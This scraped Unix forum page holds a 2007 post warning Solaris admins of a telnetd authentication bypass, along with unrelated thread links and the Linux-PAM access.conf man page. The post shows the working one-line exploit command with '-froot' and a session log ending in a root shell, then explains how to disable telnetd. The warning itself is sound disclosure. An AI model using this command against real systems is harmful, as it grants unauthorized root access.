Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: telnetd bug!
Operating Systems Solaris telnetd bug! Post 302107064 by pressy on Wednesday 14th of February 2007 05:38:47 AM
Old 02-14-2007
Error telnetd bug!
hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC

more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
 

8 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

Linux and in.telnetd problems

Hi, This is not the usual "unable to telnet to my machine" post. I: * have ensured that in.telnetd is started from inet.conf * that hosts.allow/deny are correctly configured * in.telnetd is listening, and on the correct port When I check my syslog i notice that tcpd (as I have... (3 Replies)
Discussion started by: sam_pointer
3 Replies

2. IP Networking

in.telnetd[5115] -- compromised?

/* Linux Slackware */ looking in my logs I see tons of entries similar to below. Does anyone know what these mean, and should I be concerned. I looked up a few of the IP's at Arin.net and saw that many of them belong to isp's (not good).. Any information is helpful.. Body of Messages log... (1 Reply)
Discussion started by: LowOrderBit
1 Replies

3. UNIX for Dummies Questions & Answers

Get telnetd to start a process other than login

I want to be able to get telnetd to start a program of my choice or one that I have written . . . or . . . write a daemon of my own to listen on a port other than 23 and when a connection arrives it should create a controlling tty/pty and then launch my program on the client side of the pty. A... (2 Replies)
Discussion started by: pdenaro
2 Replies

4. UNIX for Dummies Questions & Answers

telnetd: all network ports in use

I hope someone can enlighten me on this. A few weeks ago, the root file system my UnixWare 7.1.1 server became corrupt so I ended up doing a full restore of the OS from tape backup. Since then, after I get about 270 users on the system, the message "telnetd: all network ports in use" is... (1 Reply)
Discussion started by: davekox
1 Replies

5. Cybersecurity

telnetd vs telnetd -a

Hi folks. I have a quick question on using "telnetd" vs. "telnetd -a". OS: AIX 5.x (5.1 through 5.3 ML3) Some engineers at work want to stop using "telnetd -a" and use "telnetd". (and of course, if I could get a cogent answer from them, I wouldn't be posting this question...) :mad: The... (0 Replies)
Discussion started by: davidl9999
0 Replies

6. Solaris

Can't start telnetd

Hello all, I've got a problem on a V240 running Solaris 9, the telnet daemon won't start. The error message I get is "telnetd: stdin is not a socket file descriptor." I've never seen this message before and I'm not exactly sure what it means. I know generally what stdin, sockets, and file... (4 Replies)
Discussion started by: ONEX
4 Replies

7. SCO

Telnetd Port Options

Ok, here i am in 2008 trying to figure out how to edit the port of Telnetd in sco openserver 4.2. I googled my butt off and cant seem to find any info. Does anyone have some specific howto's or good documentation on this? (2 Replies)
Discussion started by: j0ntar
2 Replies

8. AIX

telnetd daemon

Hi, When a client connected to AIX server by telnet is killed/crashes, is there a way for telnetd to recognize that and close/kill the application linked/started by that telnet session? We have a situation where clients disconnect because of frequent network outages, this leaves the... (2 Replies)
Discussion started by: mreyaz
2 Replies

LEARN ABOUT CENTOS

access.conf

ACCESS.CONF(5)							 Linux-PAM Manual						    ACCESS.CONF(5)

NAME

       access.conf - the login access control table file

DESCRIPTION

       The /etc/security/access.conf file specifies (user/group, host), (user/group, network/netmask) or (user/group, tty) combinations for which
       a login will be either accepted or refused.

       When someone logs in, the file access.conf is scanned for the first entry that matches the (user/group, host) or (user/group,
       network/netmask) combination, or, in case of non-networked logins, the first entry that matches the (user/group, tty) combination. The
       permissions field of that table entry determines whether the login will be accepted or refused.

       Each line of the login access control table has three fields separated by a ":" character (colon):

       permission:users/groups:origins

       The first field, the permission field, can be either a "+" character (plus) for access granted or a "-" character (minus) for access
       denied.

       The second field, the users/group field, should be a list of one or more login names, group names, or ALL (which always matches). To
       differentiate user entries from group entries, group entries should be written with brackets, e.g.  (group).

       The third field, the origins field, should be a list of one or more tty names (for non-networked logins), host names, domain names (begin
       with "."), host addresses, internet network numbers (end with "."), internet network addresses with network mask (where network mask can be
       a decimal number or an internet address also), ALL (which always matches) or LOCAL.  LOCAL keyword matches if and only if the PAM_RHOST is
       not set and <origin> field is thus set from PAM_TTY or PAM_SERVICE". If supported by the system you can use @netgroupname in host or user
       patterns. The @@netgroupname syntax is supported in the user pattern only and it makes the local system hostname to be passed to the
       netgroup match call in addition to the user name. This might not work correctly on some libc implementations causing the match to always
       fail.

       The EXCEPT operator makes it possible to write very compact rules.

       If the nodefgroup is not set, the group file is searched when a name does not match that of the logged-in user. Only groups are matched in
       which users are explicitly listed. However the PAM module does not look at the primary group id of a user.

       The "#" character at start of line (no space at front) can be used to mark this line as a comment line.

EXAMPLES

       These are some example lines which might be specified in /etc/security/access.conf.

       User root should be allowed to get access via cron, X11 terminal :0, tty1, ..., tty5, tty6.

       + : root : crond :0 tty1 tty2 tty3 tty4 tty5 tty6

       User root should be allowed to get access from hosts which own the IPv4 addresses. This does not mean that the connection have to be a IPv4
       one, a IPv6 connection from a host with one of this IPv4 addresses does work, too.

       + : root : 192.168.200.1 192.168.200.4 192.168.200.9

       + : root : 127.0.0.1

       User root should get access from network 192.168.201.  where the term will be evaluated by string matching. But it might be better to use
       network/netmask instead. The same meaning of 192.168.201.  is 192.168.201.0/24 or 192.168.201.0/255.255.255.0.

       + : root : 192.168.201.

       User root should be able to have access from hosts foo1.bar.org and foo2.bar.org (uses string matching also).

       + : root : foo1.bar.org foo2.bar.org

       User root should be able to have access from domain foo.bar.org (uses string matching also).

       + : root : .foo.bar.org

       User root should be denied to get access from all other sources.

       - : root : ALL

       User foo and members of netgroup admins should be allowed to get access from all sources. This will only work if netgroup service is
       available.

       + : @admins foo : ALL

       User john and foo should get access from IPv6 host address.

       + : john foo : 2001:db8:0:101::1

       User john should get access from IPv6 net/mask.

       + : john : 2001:db8:0:101::/64

       Disallow console logins to all but the shutdown, sync and all other accounts, which are a member of the wheel group.

       -:ALL EXCEPT (wheel) shutdown sync:LOCAL

       All other users should be denied to get access from all sources.

       - : ALL : ALL

SEE ALSO

       pam_access(8), pam.d(5), pam(8)

AUTHORS

       Original login.access(5) manual was provided by Guido van Rooij which was renamed to access.conf(5) to reflect relation to default config
       file.

       Network address / netmask description and example text was introduced by Mike Becher <mike.becher@lrz-muenchen.de>.

Linux-PAM Manual						    09/19/2013							    ACCESS.CONF(5)
All times are GMT -4. The time now is 02:10 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy